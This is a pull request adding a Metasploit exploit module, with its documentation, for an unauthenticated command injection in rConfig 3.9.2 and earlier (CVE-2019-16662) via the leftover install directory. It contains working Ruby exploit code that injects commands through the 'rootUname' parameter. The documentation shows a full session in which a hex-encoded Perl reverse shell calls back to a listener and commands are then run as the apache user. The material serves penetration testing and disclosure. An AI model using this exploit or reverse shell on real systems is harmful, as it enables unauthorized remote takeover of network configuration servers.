### PR TITLE
Add rConfig install Command Execution exploit

### DIFF
--- a/documentation/modules/exploit/unix/webapp/rconfig_install_cmd_exec.md
+++ b/documentation/modules/exploit/unix/webapp/rconfig_install_cmd_exec.md
@@ -1,0 +1,82 @@
+## Description
+
+  This module exploits an unauthenticated command injection vulnerability
+  in rConfig versions 3.9.2 and prior. The `install` directory is not
+  automatically removed after installation, allowing unauthenticated users
+  to execute arbitrary commands via the `ajaxServerSettingsChk.php` file
+  as the web server user.
+
+
+## Vulnerable Software
+
+  This module has been tested successfully on [rConfig](https://rconfig.com/)
+  version 3.9.2 on CentOS 7.7.1908 (x64).
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/unix/webapp/rconfig_install_cmd_exec`
+  3. Do: `set rhosts <IP>`
+  4. Do: `run`
+  5. You should get a new session
+
+
+## Options
+
+  **TARGETURI**
+
+  The base path to rConfig install directory (default: `/install/`)
+
+
+## Scenarios
+
+  ```
+  msf5 > use exploit/unix/webapp/rconfig_install_cmd_exec 
+  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set rhosts 172.16.191.131
+  rhosts => 172.16.191.131
+  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set verbose true
+  verbose => true
+  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > check
+
+  [*] Executing command: id
+  [*] Response: uid=48(apache) gid=48(apache) groups=48(apache)
+  [+] 172.16.191.131:443 - The target is vulnerable.
+  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > show targets
+
+  Exploit targets:
+
+     Id  Name
+     --  ----
+     0   Unix CMD
+     1   Linux Command Stager
+
+
+  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set target 0
+  target => 0
+  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set payload cmd/unix/reverse_perl
+  payload => cmd/unix/reverse_perl
+  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set lhost 172.16.191.165 
+  lhost => 172.16.191.165
+  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [*] Executing command: id
+  [*] Response: uid=48(apache) gid=48(apache) groups=48(apache)
+  [*] Executing command: /bin/echo -ne '\x70\x65\x72\x6c\x20\x2d\x4d\x49\x4f\x20\x2d\x65\x20\x27\x24\x70\x3d\x66\x6f\x72\x6b\x3b\x65\x78\x69\x74\x2c\x69\x66\x28\x24\x70\x29\x3b\x66\x6f\x72\x65\x61\x63\x68\x20\x6d\x79\x20\x24\x6b\x65\x79\x28\x6b\x65\x79\x73\x20\x25\x45\x4e\x56\x29\x7b\x69\x66\x28\x24\x45\x4e\x56\x7b\x24\x6b\x65\x79\x7d\x3d\x7e\x2f\x28\x2e\x2a\x29\x2f\x29\x7b\x24\x45\x4e\x56\x7b\x24\x6b\x65\x79\x7d\x3d\x24\x31\x3b\x7d\x7d\x24\x63\x3d\x6e\x65\x77\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x28\x50\x65\x65\x72\x41\x64\x64\x72\x2c\x22\x31\x37\x32\x2e\x31\x36\x2e\x31\x39\x31\x2e\x31\x36\x35\x3a\x34\x34\x34\x34\x22\x29\x3b\x53\x54\x44\x49\x4e\x2d\x3e\x66\x64\x6f\x70\x65\x6e\x28\x24\x63\x2c\x72\x29\x3b\x24\x7e\x2d\x3e\x66\x64\x6f\x70\x65\x6e\x28\x24\x63\x2c\x77\x29\x3b\x77\x68\x69\x6c\x65\x28\x3c\x3e\x29\x7b\x69\x66\x28\x24\x5f\x3d\x7e\x20\x2f\x28\x2e\x2a\x29\x2f\x29\x7b\x73\x79\x73\x74\x65\x6d\x20\x24\x31\x3b\x7d\x7d\x3b\x27'|sh
+  [*] Command shell session 1 opened (172.16.191.165:4444 -> 172.16.191.131:35004) at 2019-10-29 11:48:59 -0400
+
+  id
+  uid=48(apache) gid=48(apache) groups=48(apache)
+  uname -a
+  Linux localhost.localdomain 3.10.0-1062.4.1.el7.x86_64 #1 SMP Fri Oct 18 17:15:30 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+  pwd
+  /home/rconfig/www/install/lib/ajaxHandlers
+  ^C
+  Abort session 1? [y/N]  y
+  ""
+
+  [*] 172.16.191.131 - Command shell session 1 closed.  Reason: User exit
+  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > 
+  ```
+

--- a/documentation/modules/exploit/unix/webapp/rconfig_install_cmd_exec.md
+++ b/documentation/modules/exploit/unix/webapp/rconfig_install_cmd_exec.md
@@ -48,8 +48,8 @@
 
      Id  Name
      --  ----
-     0   Unix CMD
-     1   Linux Command Stager
+     0   Automatic (Unix In-Memory)
+     1   Automatic (Linux Dropper)
 
 
   msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set target 0

--- a/modules/exploits/unix/webapp/rconfig_install_cmd_exec.rb
+++ b/modules/exploits/unix/webapp/rconfig_install_cmd_exec.rb
@@ -35,29 +35,23 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://gist.github.com/mhaskar/ceb65fa4ca57c3cdccc1edfe2390902e'],
           ['URL', 'https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/']
         ],
-      'Platform'       => %w(unix linux),
+      'Platform'       => %w[unix linux],
+      'Arch'           => [ARCH_CMD, ARCH_X86, ARCH_X64],
+      'Payload'        => {'BadChars' => "\x00\x0a\x0d\x26"},
       'Targets'        =>
         [
-          [
-            'Unix CMD',
-            {
-              'Platform' => 'unix',
-              'Arch'     => ARCH_CMD,
-              'Payload'  => {
-                'Space'       => 2048,
-                'BadChars'    => "\x00\x0A\x0D\x26",
-                'DisableNops' => true,
-                'Compat'      => { 'PayloadType' => 'cmd' }
-              }
-            }
+          ['Automatic (Unix In-Memory)',
+            'Platform'       => 'unix',
+            'Arch'           => ARCH_CMD,
+            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
+            'Type'           => :unix_memory
           ],
-          [
-            'Linux Command Stager',
-            {
-              'Platform' => 'linux',
-              'Arch'     => [ARCH_X86, ARCH_X64],
-            }
-          ],
+          ['Automatic (Linux Dropper)',
+            'Platform'       => 'linux',
+            'Arch'           => [ARCH_X86, ARCH_X64],
+            'DefaultOptions' => {'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'},
+            'Type'           => :linux_dropper
+          ]
         ],
       'Privileged'     => false,
       'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 },
@@ -110,9 +104,10 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
     end
 
-    if payload.arch.first.to_s == 'cmd'
+    case target['Type']
+    when :unix_memory
       execute_command(payload.encoded)
-    else
+    when :linux_dropper
       execute_cmdstager(:linemax => 1_500)
     end
   end

--- a/modules/exploits/unix/webapp/rconfig_install_cmd_exec.rb
+++ b/modules/exploits/unix/webapp/rconfig_install_cmd_exec.rb
@@ -1,0 +1,119 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'rConfig install Command Execution',
+      'Description'    => %q{
+        This module exploits an unauthenticated command injection vulnerability
+        in rConfig versions 3.9.2 and prior. The `install` directory is not
+        automatically removed after installation, allowing unauthenticated users
+        to execute arbitrary commands via the `ajaxServerSettingsChk.php` file
+        as the web server user.
+
+        This module has been tested successfully on rConfig version 3.9.2 on
+        CentOS 7.7.1908 (x64).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'mhaskar', # Discovery and exploit
+          'bcoles'   # Metasploit
+        ],
+      'References'     =>
+        [
+          ['CVE', '2019-16662'],
+          ['EDB', '47555'],
+          ['URL', 'https://gist.github.com/mhaskar/ceb65fa4ca57c3cdccc1edfe2390902e'],
+          ['URL', 'https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/']
+        ],
+      'Platform'       => %w(unix linux),
+      'Targets'        =>
+        [
+          [
+            'Unix CMD',
+            {
+              'Platform' => 'unix',
+              'Arch'     => ARCH_CMD,
+              'Payload'  => {
+                'Space'       => 2048,
+                'BadChars'    => "\x00\x0A\x0D\x26",
+                'DisableNops' => true,
+                'Compat'      => { 'PayloadType' => 'cmd' }
+              }
+            }
+          ],
+          [
+            'Linux Command Stager',
+            {
+              'Platform' => 'linux',
+              'Arch'     => [ARCH_X86, ARCH_X64],
+            }
+          ],
+        ],
+      'Privileged'     => false,
+      'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 },
+      'DisclosureDate' => '2019-10-28',
+      'DefaultTarget'  => 0))
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to rConfig install directory', '/install/'])
+      ])
+  end
+
+  def check
+    res = execute_command('id')
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    if res.code == 404
+      vprint_error 'Could not find install directory'
+      return CheckCode::Safe
+    end
+
+    cmd_res = res.body.scan(%r{The root details provided have not passed: (.+?)<\\/}).flatten.first
+
+    unless cmd_res
+      return CheckCode::Safe
+    end
+
+    vprint_status "Response: #{cmd_res}"
+
+    unless cmd_res.include?('uid=')
+      return CheckCode::Detected
+    end
+
+    CheckCode::Vulnerable
+  end
+
+  def execute_command(cmd, opts = {})
+    vprint_status "Executing command: #{cmd}"
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxServerSettingsChk.php'),
+      'vars_get' => {'rootUname' => ";#{cmd} #"}
+    }, 5)
+  end
+
+  def exploit
+    unless [CheckCode::Detected, CheckCode::Vulnerable].include? check
+      fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
+    end
+
+    if payload.arch.first.to_s == 'cmd'
+      execute_command(payload.encoded)
+    else
+      execute_cmdstager(:linemax => 1_500)
+    end
+  end
+end


### PR DESCRIPTION
Add rConfig install Command Execution exploit.

        This module exploits an unauthenticated command injection vulnerability
        in rConfig versions 3.9.2 and prior. The `install` directory is not
        automatically removed after installation, allowing unauthenticated users
        to execute arbitrary commands via the `ajaxServerSettingsChk.php` file
        as the web server user.

        This module has been tested successfully on rConfig version 3.9.2 on
        CentOS 7.7.1908 (x64).

It's worth noting that the installer warns the user to remove the `install` directory at the end of the installation process, and upon successful login.

![rconfig-install-warning](https://user-images.githubusercontent.com/434827/67784669-39173d80-fac0-11e9-8b21-facde4c77fb0.png)

![rconfig-login-warning](https://user-images.githubusercontent.com/434827/67784675-3b799780-fac0-11e9-98f9-1620c71ea1b0.png)
